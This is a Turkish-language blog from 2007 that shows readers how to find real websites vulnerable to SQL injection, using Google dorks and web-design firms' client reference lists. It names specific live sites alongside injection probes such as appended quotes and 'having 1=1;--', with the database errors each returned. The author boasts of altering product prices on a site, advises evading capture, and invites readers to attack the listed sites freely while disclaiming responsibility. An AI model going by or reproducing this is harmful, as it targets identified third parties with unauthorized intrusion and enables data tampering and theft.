19 Temmuz 2007 Perşembe

Sql sızma( injection) için gerçek siteleri nereden bulacağım?

Sitelerdeki sql sızma açıklarını bulmak hiç de zor değil. Kendinizi sql, mssql, mysql ya da herhangi bir veritabanı konusunda geliştirmek için ihtiyacanız olan deneme tahtalarını bulmak hiç zor değil.
Google'dan arama yaparak rahatlıklar bulabilirsiniz.

Benim denediğim yöntemle, özellikle toplu açıkları bulanabilir.

Google'da "online alışveriş çözümleri", "eticare çözümleri", "kurumsal web sitesi" kelime gruplarını arattırırsanız. Web tasarımı yapan, ticari web sitesi paketleri, alışveriş sitesi paketleri sunan biçok siteyle karşılacaksınız. Bu sitelerin referans bölümlerinden yaptıkları sitelere ulaşabilir. Referans sitedeki bağlantıları deneyerek açklar bulanabilir.

Ben sql/sızma/injection konusunda fazla tecrübeli olmamama rağmen google'da arattırdeğım birçok sitede açık bulabildim. Bu açıklar o kadar kötü açıklardı ki sitedeki ürünlerin fiyatlarını bile değiştirebiliyordum.

Aklınızdan herkes artık önlemini alıyor diye geçirebilirsiniz. Fakat yanılıyorsunuz. Bu siteleri yapanlar da sonuçta insan. Bir sitenin en az 10 tane sayfası oluyor. Bunların alt sayfaları eklentileri derken, hepsindeki sorguları, ifadeleri denetimden geçirmek kolay değil. Genellikle üye giriş sayfalarındaki formlarda süzme işlevleri kullanırlar. Fakat www.xxx.com/haber/resim.asp?resimid?=145 gibi bir sayfada "resimid" değerini süzmek ile uğraşmazlar. Çünkü bu bir resimin bağlantısıdır. Zaten javascript ile bir pencerede gösteriliyordur ve adresi görünmüyordur. Böyle küçük hatalarla - hata demeyelim önlem almamak- büyük açıklar oluşabiliyor.

Bir işyerinin referanslarının birinde açık bulduysanız, bu demektir ki onlarca sitenin açığını bulmuşsunuz. Diğer referans sitelerin bir yerinde illaki bir açık vardır.

İnsan bu, "Beşer şaşar".

Ama dikkat edilmelidir ki bu referans siteler ticari kurumların siteleridir ve içindeki bilgilerin, sahibinden izinsiz olarak ele geçirilmesi suçtur. Hırsızlık kapsamına girer. Siteki bilgilerin değiştirilmesi, silinmesi - örneğin bir ürünün fiyatının değiştirilmesi- o firmanın adresine gidip, ürünlerini kırmaktan farksızdır.

Sql konusunda, denemelerinizi yaparken dikkatli olun. Evden vs. giriyorsanız yakalanma olasılığınız yüksektir. Dikkatli olun!

Google araması ile sql test sitesi

http://www.driverara.org/sorudetay.asp?id=4715%27 having 1=1;--

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'soru.cat' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/sorudetay.asp, line 72

Google araması ile sql test sitesi

http://www.prc.gov/dockets.asp?ID=R2006-1'

Sunucu:Oracle
Hata:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Oracle][ODBC][Ora]ORA-01756: quoted string not properly terminated

/dockets.asp, line 41

http://www.trb.org/news/blurb_detail.asp?id=2326'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near ',','.

/news/blurb_detail.asp, line 24


Sql sızma denemeleri...
Sql injection

Google araması ile sql test sitesi

id=25013 having 1=1
http://www.aiim.org/standards.asp?id=25013%20having%201=1

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'vwwebarticles.ProductID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/GetArticle.asp, line 101

17 Temmuz 2007 Salı

Çözüm

Adres: http://www.xxx.com/default.asp?id=15 having 1=1;--

Hata:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value '15 having 1=1;--' to a column of data type int.

/default.asp, line 61

Çözüm:
http://www.xxx.com/default.asp?id=15' having 1=1;--

Kaynak:http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=243810&SiteID=1
Alıntı:

-
Syntax error converting the varchar value 'a' to a column of data type int

I have a table(tab1) with a column(col1) of type varchar. I insert a row with an integer value(1). And when i query the table using the sql, select col1 from tab1 where col1 = 1, it works fine.

But after i insert a varchar, say 'a' and then do the same query, i get an error message saying, "Syntax error converting the varchar value 'a' to a column of data type int.". Why is this so? Please reply.

- Try select col1 from tab1 where col1 = '1'
The ' around the 1 tells SQL server it is comparing the charater 1 not the number 1



15 Temmuz 2007 Pazar

Google araması ile sql test için site bulma

http://www.google.com.tr/search?q=inurl:"asp?id="

Arama kutusuna inurl:"asp?id=" veya inurl:"php?id=" vs. anahtar ifadeleriyle kendiniz için bir test ortamı sunacak site bulabilirsiniz.
Tabi sitenin sahibinin bu testi sunduğundan haberi olmayacak başka

inurl:"asp?%id%=0..999999"
http://www.google.com.tr/search?hl=tr&q=inurl%3A%22asp%3F%25id%25%3D0..999999

http://www.hayatiminhatasi.com

http://www.hayatiminhatasi.com
Üye giriş ekranında bariz hata var. Biraz kurcaladıktan sonra site sahibine ve üyelerine iletmek gerekli :D

http://www.onlineyayin.net/tv_yayin.asp?id

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-4.0.23a]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

/inc_sayac.asp, line 33

http://www.cnbce.com/dizi.asp?ID=3 having 1=1

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'Serials.SerialID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/dizi.asp, line 13



http://www.teknodijital.com/asp
/listgroup.asp?group=

(union)
http://www.stokburada.com/
index.php?k_id=
http://www.alisverissiteleri.net/
siteler.asp?kategori=

HackBar 1.1.1 Firefox eklentisi

HackBar bir firefox eklentisi, sql ile sitelere sızarken, sizi site adresiyle boşlukları kaldırmaktan, gerekli fonksiyonları aramaktan vs. kurtarıyor. Çok kullanışlı bir eklenti
Bu adresten inceleyebilirsiniz ve indirebilirsiniz.

http://www.alisverissiteleri.net/
alisveris.asp?sid=

Web developer extension

Bu firefox eklentisi çok işe yarıyor: Cookie silmek, düzenlemek, javascripti, meta redirecti engellemek, form detayları, gizli öğeler...
Sayfanın içini dışını gösteriyor düğmeleriyle size.
Ben http://ferruh.mavituna.com/makale/firefox-eklentileri/ Ferruh Mavituna'nın günlüğünde görmüştüm. Kullandım işe yarıyor.

Aman ha, siteyle ilgim yok. Sadece internette ararken buldum.

"http://www.sicakhikaye.com/
kategori.asp?id="


Site bir "porno hikaye" sitesi. En baştan söyleyeim işim olmaz nu sitelerle. Fakat asp kullanmış. Açığı belli artık nasıl oynarsanız. id= yerine yaza yaza sızacaksınız artık...

Sql injection

Sql ile uğraşırken google'da arama yapıp, açığı olan siteleri yayınlıyorum. Gerçek hayatta sitelerde hala açıklar var. Bir çeşit canlı deneme ortamı oluşturuyoeum. Siz de bu günlükten yaralanıp, sitelerde kendinizi sınayabilirsiniz sql ile sızma konusunda.

En baştan söyleyeyim bu siteleri test amaçlı bulup yazıyorum. Oyun parkı gibi bir şey yani...

Siteler üstünde dilediğinizi yapmakta serbestsiniz. Sonuçların tüm sorumluluğu, sitelere sızma girişiminde bulunan arkadaşlarındır. Bu siteleri yayınlayan ben de değil.

Hadi Eyvallah,
Kolay gelsin.